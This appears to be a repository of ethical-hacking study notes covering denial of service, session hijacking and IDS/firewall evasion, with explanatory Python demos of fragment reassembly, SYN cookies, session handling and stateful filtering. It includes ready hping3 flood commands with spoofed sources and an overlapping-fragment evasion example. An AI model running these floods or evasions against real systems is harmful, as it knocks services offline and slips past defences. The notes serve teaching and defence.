├── 1-Introduction.md
├── 10-Denial-of-Service.md
├── 11-Session-Hijacking.md
├── 12-Evading-IDS-Firewalls-and-Honeypots.md
├── 13-Hacking-Web-Servers.md
├── 14-Hacking-Web-Applications.md
├── 14-Pentesting.md
├── 16-Hacking-Wireless-Networks.md
├── 17-Hacking-Mobile-Platforms-and-IoT.md
├── 19-Cloud Computing.md
├── 2-Footprinting-and-Reconnaissance.md
├── 20-Cryptography.md
├── 3-Scanning-Networks.md
├── 5-Vulnerability-Analysis.md
├── 6-System-Hacking.md
├── 7-Malware.md
├── 8-Sniffing.md
├── 9-Social-Engineering.md
├── All-Modules.html
├── All-Modules.md
└── README.md

/10-Denial-of-Service.md:

# Denial of Service

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/9-Denial-of-Service)**

## DoS
*A Denial of Service (DoS) is an attack on a service that disrupts its normal function and prevents legitimate users from accessing it. The most common target is an online service such as a website, but attacks can also be launched against networks, machines or a single program.*

DoS attacks can cause the following problems:
- Ineffective (degraded) services
- Inaccessible services
- Interruption of network traffic
- Connection interference

## DDoS
*A distributed denial of service (DDoS) attack is launched from numerous compromised devices, often distributed globally, collectively referred to as a **botnet**.*

![dos](https://www.imperva.com/learn/wp-content/uploads/sites/13/2019/01/hits-per-second.png)

**Goal:**
- Take down a system or deny access to it by its authorized users.
### **Botnet**
*A network of compromised ("zombie") computers that an attacker controls to launch a distributed attack.*
- Botnets are used for malicious tasks including **spam, data theft, ransomware distribution, click fraud and distributed denial-of-service (DDoS) attacks.**
- Command and control (C2) can run over HTTP, HTTPS, IRC, or ICQ.

![botnet](https://www.f5.com/content/dam/f5-labs-v2/article/articles/edu/20190605_what_is_a_ddos/DDoS_attack.png)

- **Botnet Scanning Methods** (how a bot finds new hosts to infect):
  - **Random** - Probes randomly generated addresses for vulnerable devices
  - **Hitlist** - Works through a pre-built list of devices to scan for vulnerabilities
  - **Topological** - Scans hosts discovered on already-compromised devices (address books, known-hosts files, configuration)
  - **Local subnet** - Scans the local network of the compromised host for vulnerable devices
  - **Permutation** - Scans a shared address list in an order produced by a pseudorandom permutation, so bots do not duplicate each other's work

## Three Types of DoS / DDoS

### **1. Volumetric attacks**
- Consume the bandwidth of the target network or service.
- Send a massive amount of traffic to the target network with the goal of consuming **so much bandwidth** that legitimate users are denied access.
- Bandwidth depletion attacks come in two forms: flood attacks and amplification attacks.

- **Attacks**:
  - UDP flood attack
  - ICMP flood attack
  - Ping of Death attack
  - Smurf attack (ICMP amplification)
  - Fraggle (UDP amplification)
  - Malformed IP packet flood attack
  - Spoofed IP packet flood attack

> - ⚠️ **Volumetric attacks are measured in bits per second (bps).**

### **2. Protocol Attacks**
- Consume other types of resources, such as the **connection state tables** in network infrastructure components like **load balancers, firewalls, and application servers**.
- **Attacks**:
  - SYN flood attack
  - Fragmentation attack
  - ACK flood attack
  - TCP state exhaustion attack
  - TCP connection flood attack
  - RST attack

> - ⚠️ **Protocol attacks are measured in packets per second (pps).**

### **3. Application Layer Attacks**

- Include low-and-slow attacks, GET/POST floods, attacks that target vulnerabilities in Apache, Windows or OpenBSD, and more.
- Consume the resources the application itself needs to run (worker threads, database connections, CPU), so far less traffic is needed than for a volumetric attack.
- Target web servers, web applications and specific web-based apps.
- Abuse higher-layer (7) protocols such as HTTP/HTTPS, DNS and SNMP.
- **Attacks**:
  - HTTP GET/POST flood
  - Slowloris attack

> - ⚠️ **Application layer attacks are measured in requests per second (rps).**

> - ⚠️ **Application level attacks exploit weak or expensive code paths (e.g. an unauthenticated search or login endpoint that does heavy work per request).**


## Attacks explanation

### **IP Fragmentation attacks**
- IP / ICMP fragmentation attacks are a common form of volumetric DoS. The datagram fragmentation mechanism is used to overwhelm the target.

- The destination is bombarded with fragmented packets and must hold memory (a reassembly buffer) for every incomplete datagram until it times out; enough incomplete datagrams exhaust that memory and overwhelm the target.

- **Can manifest in different ways:**
  - **UDP fragment flooding** - the attacker sends large volumes of fragments from numerous (usually spoofed) sources.
  - **UDP and ICMP fragmentation attack** - only some of the fragments of each packet are sent, so the datagrams can never be reassembled and the reassembly buffers are held until they time out; the server's resources are quickly consumed.
  - **TCP fragmentation attack** - also known as a Teardrop attack; targets the TCP/IP reassembly code with fragments whose offsets overlap so that they cannot be reassembled correctly. Vulnerable stacks mishandle the overlap and the targeted host crashes or hangs.
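The fragmentation behaviour described above is easier to see in code. The following is an added example (not from the original notes): a minimal fragment reassembler with two overlap policies, "first" (earlier bytes win) and "last" (later bytes win). Real stacks differ on this point, which is what both the Teardrop attack and the overlapping-fragment IDS evasion in the Evading IDS chapter rely on: the IDS and the end host can rebuild different payloads from the same fragments. Offsets are plain byte offsets for readability (real IP headers count 8-byte units), and the fragment sets are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Fragment:
    """One IP fragment. Offsets are in bytes here; real IP headers count 8-byte units."""
    offset: int
    data: bytes

    @property
    def end(self):
        return self.offset + len(self.data)


def reassemble(fragments, policy="first"):
    """Reassemble fragments in arrival order, resolving overlaps by policy.

    policy="first": bytes already received are kept (the earlier fragment wins).
    policy="last" : a later fragment overwrites the bytes it overlaps.
    Snort's frag3 preprocessor exposes these two (and OS-specific) policies so the
    sensor can mimic the host it protects. Returns None when the datagram has a hole.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    total = max(f.end for f in fragments)
    buf = bytearray(total)
    seen = bytearray(total)          # 1 where a byte has already been written
    for frag in fragments:
        for i, byte in enumerate(frag.data):
            pos = frag.offset + i
            if seen[pos] and policy == "first":
                continue
            buf[pos] = byte
            seen[pos] = 1
    if not all(seen):
        return None
    return bytes(buf)


def is_teardrop_shaped(fragments):
    """True if some fragment lies entirely inside an earlier one (its end strictly
    before the earlier fragment's end). That layout made old reassembly code compute
    a negative copy length, which is the Teardrop crash; reassemble() handles it safely."""
    for i, later in enumerate(fragments):
        for earlier in fragments[:i]:
            if earlier.offset <= later.offset and later.end < earlier.end:
                return True
    return False


# Constructed fragments: a benign request arrives first, then an overlapping
# fragment rewrites the path on stacks that favour the later fragment.
EVASION_FRAGMENTS = [
    Fragment(0, b"GET /"),
    Fragment(5, b"robots.txt"),
    Fragment(5, b"shell.cgi?"),      # exactly the span of the previous fragment
    Fragment(15, b" HTTP/1.0"),
]

# Constructed Teardrop-style pair: the second fragment sits inside the first.
TEARDROP_FRAGMENTS = [
    Fragment(0, b"A" * 24),
    Fragment(8, b"B" * 8),
]
```

Run `reassemble(EVASION_FRAGMENTS, "first")` and `reassemble(EVASION_FRAGMENTS, "last")` to see the two different requests a "first" sensor and a "last" host would each believe was sent; an IDS must be told which policy its protected hosts use or it can be made to inspect the wrong one.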
### **TCP state-exhaustion attack**
- Attempts to fill the connection state tables of stateful devices: **load balancers, firewalls and application servers.** Once the table is full, new legitimate connections are refused even though bandwidth is still available.

### **Slowloris attack**
*An application layer attack that uses partial HTTP requests. It opens connections to a targeted web server and keeps each one open for as long as it can by never completing the request.*

- ![slowloris](https://www.cloudflare.com/img/learning/ddos/ddos-slowloris-attack/slowloris-attack-diagram.png)

- The attacker first opens multiple connections to the targeted server by sending multiple partial HTTP request headers.
- The target allocates a worker (thread or process) for each incoming request.
- To stop the target from timing out the connections, the attacker periodically sends another partial header line on each connection to keep the request alive. In essence saying, "I'm still here! I'm just slow, please wait for me."
- The targeted server is never able to release any of the open partial connections while it waits for the end of the request headers.
- Once all available workers are in use, the server cannot respond to additional requests from regular traffic, resulting in denial-of-service.
- Servers with a worker-per-connection model (e.g. Apache prefork) are the most exposed; event-driven servers and a short header-read timeout limit the damage.

### **SYN flood (half-open attack)**
- The attacker sends thousands of SYN packets, usually with a **spoofed source address**, and never completes the handshake.
- For every SYN the server replies with SYN-ACK and stores a **half-open connection** entry in its SYN backlog while it **waits for the final ACK, which never arrives**. Meanwhile the attacker keeps sending more SYNs.
- Each half-open entry is kept until its retransmission timer gives up (tens of seconds); once the backlog is full, new SYNs from legitimate clients are dropped and the service is unreachable even though the machine is otherwise idle.
- SYN cookies are the standard defence: the server answers SYNs without keeping backlog state by encoding a keyed hash of the connection details in its initial sequence number and validating the returned ACK against it.

- ![syn-flood](https://www.cloudflare.com/img/learning/ddos/syn-flood-ddos-attack/syn-flood-attack-ddos-attack-diagram-2.png)

### **ICMP flood**
- Sends a stream of ICMP Echo Request packets, usually from spoofed addresses, until the target's packet-per-second capacity (or its bandwidth) is exhausted.
- `hping3` can perform an ICMP flood:
  - `hping3 -1 --flood --rand-source <target>`

### **Smurf attack**
- The Smurf attack is an ICMP **amplification/reflection** attack: the attacker sends ICMP Echo Requests with the victim's **spoofed source IP to the broadcast address of a network**, and every host on that network replies to the victim.
- `hping3` can be used in a bash loop to hit every host in a subnet directly (`$i` is the loop variable):
  - `hping3 -1 -c 1000 10.0.0.$i --fast -a <victim>`
- ![smurf](https://www.imperva.com/learn/wp-content/uploads/sites/13/2019/01/smurf-attack-ddos.png)
- Routers drop directed broadcasts by default (RFC 2644), so classic Smurf rarely works today.

### **Fraggle**
- Same concept as the Smurf attack but with **UDP packets**, typically aimed at the echo (7) or chargen (19) services; without a broadcast target it is just a UDP flood.
- `hping3` can perform a plain UDP flood:
  - `hping3 --flood --rand-source --udp -p <port> <target>`

### **Ping of Death**
- Sends an oversized ICMP Echo Request in fragments; after reassembly the packet exceeds the 65,535-byte maximum IP packet size and overflows the receiving stack's buffer, crashing the system.
- Old technique that only affects old, unpatched systems.
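To make the SYN flood mechanics and the SYN-cookie defence from the section above concrete, here is an added example (not code from the original notes) of a toy listener that can run either way. With cookies off it keeps one half-open entry per SYN and a spoofed flood fills the backlog; with cookies on it keeps nothing until the ACK carries a valid cookie. The cookie layout follows the classic scheme (5 bits of time counter, 3 bits of MSS index, 24 bits of keyed hash); HMAC-SHA256, the secret, the addresses and the tiny backlog limit are all constructed for the example.

```python
import hashlib
import hmac
import secrets

SECRET = b"constructed-demo-secret"   # constructed; a real stack rotates a random key
SERVER = ("10.0.0.1", 80)            # constructed listener address
BACKLOG_LIMIT = 4                     # tiny on purpose so the flood fills it quickly


def syn_cookie(client, client_isn, minute, mss_index, secret=SECRET):
    """Stateless server ISN: 5 bits of time counter, 3 bits of MSS index and a
    24-bit keyed hash over the 4-tuple, counter and the client's own ISN.
    (HMAC-SHA256 stands in for the kernel's hash function.)"""
    msg = f"{client[0]}:{client[1]}>{SERVER[0]}:{SERVER[1]}:{client_isn}:{minute % 32}".encode()
    mac = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")
    return ((minute % 32) << 27) | ((mss_index & 7) << 24) | mac


def check_cookie(ack_seq, client, client_isn, now_minute, secret=SECRET):
    """Validate the final ACK of a handshake (ack_seq must be cookie + 1). Returns the
    MSS index encoded in the cookie, or None if it is forged or older than a minute."""
    cookie = (ack_seq - 1) & 0xFFFFFFFF
    minute_bits = cookie >> 27
    mss_index = (cookie >> 24) & 7
    for m in (now_minute, now_minute - 1):
        if m % 32 == minute_bits and syn_cookie(client, client_isn, m, mss_index, secret) == cookie:
            return mss_index
    return None


class Listener:
    """Toy TCP listener: with cookies off it keeps a half-open entry per SYN;
    with cookies on it keeps nothing until the ACK proves the client is real."""

    def __init__(self, use_cookies):
        self.use_cookies = use_cookies
        self.half_open = {}        # client -> server ISN: the state a flood exhausts
        self.established = set()
        self.dropped = 0

    def on_syn(self, client, client_isn, minute):
        if self.use_cookies:
            return syn_cookie(client, client_isn, minute, mss_index=3)
        if len(self.half_open) >= BACKLOG_LIMIT:
            self.dropped += 1      # backlog full: the SYN is silently dropped
            return None
        isn = secrets.randbits(32)
        self.half_open[client] = isn
        return isn

    def on_ack(self, client, client_isn, ack_seq, minute):
        if self.use_cookies:
            if check_cookie(ack_seq, client, client_isn, minute) is None:
                return False
        else:
            isn = self.half_open.pop(client, None)
            if isn is None or ack_seq != (isn + 1) & 0xFFFFFFFF:
                return False
        self.established.add(client)
        return True


def simulate(use_cookies, flood_syns=1000):
    """Flood the listener with spoofed SYNs that are never ACKed, then attempt one
    legitimate handshake. Returns True if the legitimate client gets connected."""
    srv = Listener(use_cookies)
    for i in range(flood_syns):
        srv.on_syn((f"198.51.100.{i % 250}", 1024 + i), client_isn=i, minute=10)
    legit = ("192.0.2.7", 40000)
    isn = srv.on_syn(legit, client_isn=4242, minute=10)
    if isn is None:
        return False
    return srv.on_ack(legit, client_isn=4242, ack_seq=(isn + 1) & 0xFFFFFFFF, minute=10)
```

`simulate(False)` fails because four half-open entries already fill the backlog; `simulate(True)` succeeds because no state was kept for the thousand spoofed SYNs. The price of cookies is visible in the layout: only 3 bits survive for the MSS, and any TCP option that is not encoded in the cookie is lost.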
### **Teardrop**
- Sends IP fragments whose offsets overlap (in some variants with oversized payloads); older systems crash because their fragment reassembly code mishandles the overlap.

### **Peer to peer**
- Clients of a peer-to-peer file-sharing hub are disconnected and redirected to connect to the target system, which is then flooded by thousands of legitimate-looking clients.

### **Multi-vector attack**
- A combination of **volumetric, protocol, and application-layer attacks**, often switched between to defeat mitigations tuned for one type.

### **Phlashing / Permanent DoS**
- A DoS attack that causes permanent damage to a system.
- Modifies the firmware and can **brick** the device.
- *e.g: Send a fraudulent firmware/hardware update to the victim that corrupts the BIOS.*

### **LAND attack**
- Sends a SYN packet whose spoofed source IP and port equal the destination IP and port; a vulnerable target replies to itself in an endless loop and crashes or hangs.


## DoS/DDoS Attack Tools:
- **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests
- ![loic](https://i.ytimg.com/vi/HavEPVxUn-A/maxresdefault.jpg)

- **High Orbit Ion Cannon** (HOIC) - Successor to LOIC that sends HTTP GET/POST floods (unlike LOIC it has no raw TCP/UDP mode) and uses "booster" scripts to vary the requests; the application can run up to 256 simultaneous attack sessions, sending a continuous stream of junk traffic until legitimate requests can no longer be processed.
- ![hoic](https://upload.wikimedia.org/wikipedia/commons/d/d8/HOIC_INTERFACE.png)

- **Other Tools**
  - HULK - HTTP flooder that randomizes every request to defeat caching
  - Metasploit - ships auxiliary DoS modules
  - Nmap - NSE scripts in the `dos` category
  - Tsunami
  - Trinity - Linux based DDoS tool
  - Tribe Flood Network (TFN) - classic master/agent DDoS tool that coordinates compromised hosts to launch massive flood attacks
  - RUDY (R-U-Dead-Yet?) - DoS with HTTP POST via long-form field submissions, sent one byte at a time to hold the connection open

## Mitigations
- Traffic analysis
- Filtering
- Firewalls
- ACLs
- Reverse proxies / scrubbing services
- Rate limiting - limiting the maximum number of connections or requests a single IP address is allowed to make
- Load balancers
- DoS prevention software
- Ingress filtering of spoofed source addresses at the network edge (BCP 38)

/11-Session-Hijacking.md:

# Session Hijacking

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/10-Session-Hijacking)**

*The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed by a session token.* [[+]](https://owasp.org/www-community/attacks/Session_hijacking_attack)

- HTTP communication uses many different TCP connections, so the web server needs a method to recognize every user's connections.
- The most common method relies on a **token** that the web server sends to the client browser after a successful client authentication.
- A **session token** is normally a string of variable width and it can be carried in different ways:
  - in the URL, in the HTTP request header as a cookie, in other parts of the HTTP request header, or in the body of the HTTP request.

**The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the web server.**

*(Figure: Session Hijacking using XSS)*

## **The session token could be compromised in different ways; the most common are:**

### **Predictable session token**
- The session ID for an application is normally a string of fixed width. **Randomness is very important** to prevent its prediction: a session ID should come from a cryptographically secure random generator and carry at least 64 bits of entropy; anything derived from the username, a timestamp or a sequential counter can be guessed.
- **Example:** the session ID value is "user01", which corresponds to the username. By trying new values such as "user02", it is possible to enter the application without prior authentication.

### **Session Sniffing**
- Sniffing can be used to hijack a session when the communication between the web server and the user is not encrypted and the session ID is sent in plain text.
- **Wireshark** and **Kismet** (wireless) can capture sensitive data packets such as the session ID from the network.

### **Cross-site scripting (XSS)**
- A server can be vulnerable to a cross-site scripting exploit, which lets an attacker run malicious code on the user's side and gather session information. An attacker can target a victim's browser with a link carrying a script; when the user opens it, the malicious JavaScript runs in the browser (e.g. reading `document.cookie` and sending it to the attacker) and the session is hijacked. Cookies flagged `HttpOnly` cannot be read this way.

### **CSRF - Cross-Site Request Forgery**
- Forces an end user to execute unwanted actions on a web application in which they are currently authenticated. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
- A CSRF attack can force the user to perform state-changing requests like transferring funds or changing their email address. If the victim is an administrative account, CSRF can compromise the entire web application.
- CSRF does not steal the token; it abuses the browser's habit of attaching the session cookie to every request for that site, which is why anti-CSRF tokens and `SameSite` cookies are the fix.

- **CSRF Scenario:**
  1. Visit your bank's site, log in.
  2. Then visit the attacker's site (e.g. a sponsored ad from an untrusted organization).
  3. The attacker's page includes a form with the same fields as the bank's "Transfer Funds" form.
  4. The form fields are pre-filled to transfer money from your account to the attacker's account.
  5. The attacker's page includes JavaScript that submits the form to your bank.
  6. When the form is submitted, the browser includes your cookies for the bank site, including the session token.
  7. The bank transfers money to the attacker's account.
  8. The form can be in an invisible iframe, so you never know the attack occurred.

### **Session Fixation**
- Session Fixation is an attack that permits an attacker to hijack a valid user session. It exploits a weakness in the way the web application manages the session ID: the application keeps using a session ID that was issued (or accepted) before the user authenticated.

- **Session fixation Scenario**:
  1. The attacker accesses the web application login page and **receives a session ID** generated by the web application.
  2. The attacker uses an additional technique such as **CRLF injection, a man-in-the-middle attack, social engineering,** etc., to get the victim to use the **provided session identifier**.
  3. The victim accesses the web application login page and logs in. After authentication, the **web application treats anyone who uses this session ID as if they were this user.**
  4. The attacker uses the session ID to access the web application, **take over the user session, and impersonate the victim**.

- The defence is to issue a brand-new session ID at login and invalidate the old one.

### **Man-in-the-browser attack**
- The Man-in-the-Browser attack follows the same approach as a Man-in-the-middle attack, but here a Trojan horse installed in the victim's browser intercepts and manipulates calls between the browser's main executable and its libraries or security mechanisms, so it sees pages after TLS decryption and can alter the transactions the user believes they are making.
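The predictable-token, CSRF and session-fixation scenarios above all come down to how the server manages its session table. The following is an added example (not code from the original notes or from OWASP) of a small server-side session store that applies the countermeasures listed later in this chapter: IDs from the OS CSPRNG, a fresh ID issued at login so a planted ID is never promoted to an authenticated one, an inactivity timeout, and an anti-CSRF token bound to the session with an HMAC. The class and function names, the secret key and the integer clock are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets


class SessionStore:
    """Server-side session table with the chapter's countermeasures built in.
    Times are plain integers (seconds) so the example stays deterministic."""

    def __init__(self, secret, idle_timeout=3600):
        self.secret = secret                 # key for the CSRF HMAC (constructed in tests)
        self.idle_timeout = idle_timeout
        self.sessions = {}                   # session id -> {"user": ..., "last_seen": ...}

    @staticmethod
    def _new_id():
        # 32 bytes from the OS CSPRNG: 256 bits of entropy, unlike "user01"
        return secrets.token_urlsafe(32)

    def new_session(self, now):
        """Anonymous (pre-authentication) session, e.g. for the login page."""
        sid = self._new_id()
        self.sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def login(self, old_sid, user, now):
        """Authenticate: the pre-auth id is discarded and a fresh one issued, so an id
        planted by an attacker (session fixation) never becomes authenticated."""
        self.sessions.pop(old_sid, None)
        sid = self._new_id()
        self.sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def user_for(self, sid, now):
        """Resolve a session id; expire it if idle for longer than idle_timeout."""
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            del self.sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid):
        self.sessions.pop(sid, None)

    def csrf_token(self, sid):
        """Token the server embeds in its own forms; bound to the session via HMAC."""
        return hmac.new(self.secret, sid.encode(), hashlib.sha256).hexdigest()

    def check_csrf(self, sid, submitted):
        """A cross-site form carries the cookie automatically but cannot read the token."""
        return hmac.compare_digest(self.csrf_token(sid), submitted or "")


def set_cookie_header(sid):
    """HttpOnly blocks document.cookie, Secure keeps the cookie off plain HTTP,
    SameSite=Lax stops the browser attaching it to cross-site POSTs."""
    return f"Set-Cookie: session={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"


def fixation_scenario(store):
    """Attacker obtains a pre-auth id and plants it; the victim logs in with it.
    Returns (what the planted id resolves to, what the victim's new id resolves to)."""
    planted = store.new_session(now=0)
    victim_sid = store.login(planted, "victim", now=1)
    return store.user_for(planted, now=2), store.user_for(victim_sid, now=2)


def csrf_scenario(store):
    """Forged cross-site POST (cookie only) versus the site's own form (cookie + token).
    Returns (forged accepted?, legitimate accepted?)."""
    sid = store.login(store.new_session(now=0), "victim", now=1)
    forged = store.check_csrf(sid, "")
    legitimate = store.check_csrf(sid, store.csrf_token(sid))
    return forged, legitimate
```

`fixation_scenario` returns `(None, "victim")`: the attacker's planted ID is dead after login. `csrf_scenario` returns `(False, True)`: the forged request has the cookie but not the token. The HMAC binding means a token is only as secret as the session ID it is derived from, which is fine because an attacker who has the session ID no longer needs CSRF.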
### **Man-in-the-middle attack**
- MITM attack is a general term for when a perpetrator positions himself in a conversation between a user and an application, either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway.


## Other attacks
- **Compression Ratio Info-leak Made Easy (CRIME)**:
  - A security exploit against secret web cookies over HTTPS and SPDY connections that use TLS-level data compression. By injecting guesses into requests and watching the compressed size, the attacker recovers the content of secret authentication cookies and can then hijack the session.
- **BREACH**:
  - The same idea applied to **HTTP-level compression** (gzip/DEFLATE of the response body) rather than TLS compression, which is why disabling TLS compression does not stop it. BREACH is built on the CRIME exploit and targets secrets reflected in response bodies, such as CSRF tokens.

> ⚠️ **SPDY is a protocol that manipulates HTTP traffic with the goals of reducing web page load latency and improving web security; it was the basis for HTTP/2.**

- **Forbidden Attack**
  - Vulnerability in TLS implementations that incorrectly reuse the **same cryptographic nonce when data is encrypted** with AES-GCM. The TLS specification is clear that a nonce must be used only once per key; when one is reused, the attacker can recover the authentication key and forge ciphertext, which is the "forbidden" attack.

## Network Layer Attacks
- **TCP Hijacking**: TCP/IP hijacking is when an unauthorized user takes over a genuine network connection of another user after authentication has already happened. It is done to bypass the password authentication that normally starts a session; the attacker must observe or predict the sequence numbers to inject packets.
  - e.g: TELNET hijacking using Ettercap or Shijack, or a blind hijacking (sequence-number guessing without seeing the traffic).

### **Tools**
- **Ettercap** - MiTM tool and packet sniffer on steroids
- **Hunt** - sniff, hijack and reset connections
- **T-Sight** - easily hijack sessions and monitor network connections
- **Zaproxy**
- **Burp Suite**
- **Paros**
- **Shijack** - TCP/IP hijack tool
- **Juggernaut**
- **Hamster**
- **Ferret**

## Countermeasures
* **Session IDs**
  - Use unpredictable (randomized) session IDs
  - Never put session IDs in URLs
  - Don't re-use session IDs
  - Set **HttpOnly** on cookies so script cannot read them (limits cookie theft via XSS; it does not stop XSS itself), **Secure** so they are only sent over HTTPS, and **SameSite** to limit CSRF
  - Don't use HTTP without encryption; use TLS/SSL [HTTPS]
  - Limit incoming connections
  - Minimize remote access
  - Regenerate the session ID after authentication (defeats session fixation)
  - Time limits: absolute and inactivity *(e.g: after 1h of inactivity the user is automatically logged off)*
  - Use **MFA**
  - Use **IPSec to encrypt**

### IPSec
- **Transport Mode** - payload and ESP trailer are encrypted; the IP header is not.
- **Tunnel mode** - the whole original packet, including its IP header, is encrypted and wrapped in a new IP header. AH cannot be used through NAT because NAT rewrites header fields covered by AH's integrity check; ESP can traverse NAT with NAT-Traversal (ESP inside UDP port 4500).
- **Architecture Protocols**
  - **Authentication Header** (AH) - guarantees the integrity of the IP packet and authenticates its sender, but provides no confidentiality
  - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality
  - **Internet Key Exchange** (IKE) - negotiates the security associations and produces the keys for the encryption process
  - **Oakley** - key-exchange protocol that uses Diffie-Hellman to create master and session keys
  - **Internet Security Association Key Management Protocol** (ISAKMP) - framework for authenticating peers and negotiating security associations; IKE combines ISAKMP with Oakley

/12-Evading-IDS-Firewalls-and-Honeypots.md:

# Evading IDS, Firewalls and Honeypots

## IDS/IPS - Basic Concepts

**Intrusion Prevention System (IPS)** - ACTIVE, inline monitoring of activity looking for anomalies, alerting/notifying AND **taking action (dropping or resetting the traffic) when they are found**.

**Intrusion Detection System (IDS)** - PASSIVE monitoring of activity (usually from a SPAN port or tap) looking for anomalies and alerting/notifying when they are found.

### **Deployment Types - HIDS & NIDS & WIDS:**
1. **Host based** - Monitors activity on a single device/host by being installed locally.

2. **Network based** - Monitors activity across a network using remote sensors that report back to a central system. Often paired with a Security Information and Event Management (SIEM) system for analysis. Reverse ARP or reverse DNS lookups are often used to identify the source.

3. **Wireless** - Monitors the radio spectrum for rogue access points and wireless attacks.

### **Knowledge & Behavior-Based Detection:**
1. **Knowledge Based (Signature Based | Pattern Matching)** - Most common form of detection. Uses a database of profiles, or signatures, to assess all traffic against. Cannot detect an attack it has no signature for.

2. **Behavior Based (Statistical | Anomaly | Heuristic)** - Starts by creating a baseline of behavior for the monitored system/network and then compares all traffic against that, looking for deviations. Can be labeled an AI or expert system. Catches novel attacks but produces more false positives.

---
### **Types of IDS Alerts**
- **True Positive** --> Attack - Alert ✅✅
- **False Positive** --> No Attack - Alert ❌✅
- **False Negative** --> Attack - No Alert ✅❌
  - *This is the worst scenario*
- **True Negative** --> No Attack - No Alert ❌❌

---

## Firewalls - Basic Concepts
*Firewalls are often seen as network access control devices. They use rule sets to filter traffic and thereby implement a security policy.*

### **Firewall types:**
- **Stateful (Dynamic Packet Filtering)** - Layer 3 + 4 (Network + Transport layer); tracks connections in a state table and judges each packet against it
- **Stateless (Static Packet Filtering)** - Layer 3 (Network) plus the port and flag fields of the Layer 4 header; each packet is judged on its own
- **Deep Packet Inspection** - Layer 7 (Application Layer)
- **Proxy Firewall** - Mediates communications between untrusted and trusted end-points (servers/hosts/clients). A proxy firewall is a network security system that protects network resources by filtering messages at the Application Layer (7). A proxy firewall may also be called an application firewall or gateway firewall.
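The stateful versus stateless distinction above decides which of the firewall evasion tricks later in this chapter (ACK tunneling, tiny fragments) actually work. The following is an added example (not code from the original notes) of both filter types reduced to their decision logic, replayed over four constructed packets: a normal web handshake, an inbound packet with only ACK set aimed at a closed port, and a non-first IP fragment with no transport header. The `Packet` class, the policy set and the addresses are assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False
    fin: bool = False
    frag_offset: int = 0      # IP fragment offset; non-zero = later fragment, no TCP header visible


INBOUND_ALLOWED = {80, 443}   # constructed policy: the only services exposed from outside


class StatelessFilter:
    """Static packet filter: every packet is judged on its own header bits."""

    def accept(self, pkt):
        if pkt.frag_offset != 0:
            return True           # no transport header to check: the tiny-fragment hole
        if pkt.dport in INBOUND_ALLOWED:
            return True
        # "established" approximation: ACK set, SYN clear. Anyone can set ACK on a packet.
        return pkt.ack and not pkt.syn


class StatefulFilter:
    """Dynamic packet filter: a connection table admits only packets of flows
    that were opened by a SYN the policy allowed."""

    def __init__(self):
        self.table = set()        # (src, sport, dst, dport) as seen from the initiator

    def _flow(self, pkt):
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.table:
            return key
        if reverse in self.table:
            return reverse
        return None

    def accept(self, pkt):
        flow = self._flow(pkt)
        if pkt.frag_offset != 0:
            return flow is not None   # later fragments only for flows already admitted
        if flow is None:
            if pkt.syn and not pkt.ack and pkt.dport in INBOUND_ALLOWED:
                self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
                return True
            return False              # a bare ACK with no state behind it is dropped here
        if pkt.fin:
            self.table.discard(flow)
        return True


def scenario():
    """Replay constructed traffic through both filters.
    Returns {name: (stateless verdict, stateful verdict)}."""
    traffic = [
        ("web_syn", Packet("203.0.113.5", 51000, "10.0.0.80", 80, syn=True)),
        ("web_ack", Packet("203.0.113.5", 51000, "10.0.0.80", 80, ack=True)),
        ("ack_tunnel", Packet("203.0.113.66", 4000, "10.0.0.80", 4444, ack=True)),
        ("tiny_frag", Packet("203.0.113.66", 4000, "10.0.0.80", 4444, frag_offset=1)),
    ]
    stateless, stateful = StatelessFilter(), StatefulFilter()
    return {name: (stateless.accept(pkt), stateful.accept(pkt)) for name, pkt in traffic}
```

`scenario()` shows the web handshake passing both filters, while the ACK-only probe and the orphan fragment pass the stateless filter and are dropped by the stateful one, because neither belongs to a flow the firewall saw being opened.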
### **Proxy Types:**
- **Circuit-level proxy** - Firewall that works at **Layer 5 (Session layer)**; it monitors the TCP handshake to determine whether a requested session is legitimate, then relays bytes without looking at the application protocol.
- **Application-level proxy** - Any service or server that acts as a proxy for client requests at the application's protocol level.

> **⚠️ An application-level proxy is one that knows about the particular application it is providing proxy services for; it understands and interprets the commands in the application protocol. A circuit-level proxy is one that creates a circuit between the client and the server without interpreting the application protocol.**

- **Multi-homed Firewall (dual-homed)** - Firewall that has two or more interfaces; one interface is connected to the untrusted network and another to the trusted network. A DMZ can be added to a multi-homed firewall just by adding a third interface.

- **Bastion host** - Endpoint that is exposed to the internet but has been hardened to withstand attacks; hosts on the screened subnet designed to protect internal resources.

- **Screened host** - Endpoint that is protected by a firewall.

- **Packet-filtering** - Firewalls that only look at headers.


> ⚠️ Rule sets end with an **implicit deny**: traffic is blocked unless a rule explicitly allows it.

> ⚠️ Firewalls often perform **network address translation** (NAT), which can apply a one-to-one or one-to-many relationship between external and internal IP addresses.

> ⚠️ **Private zone** - hosts internal hosts that only respond to requests from within that zone


## Honeypots 🍯
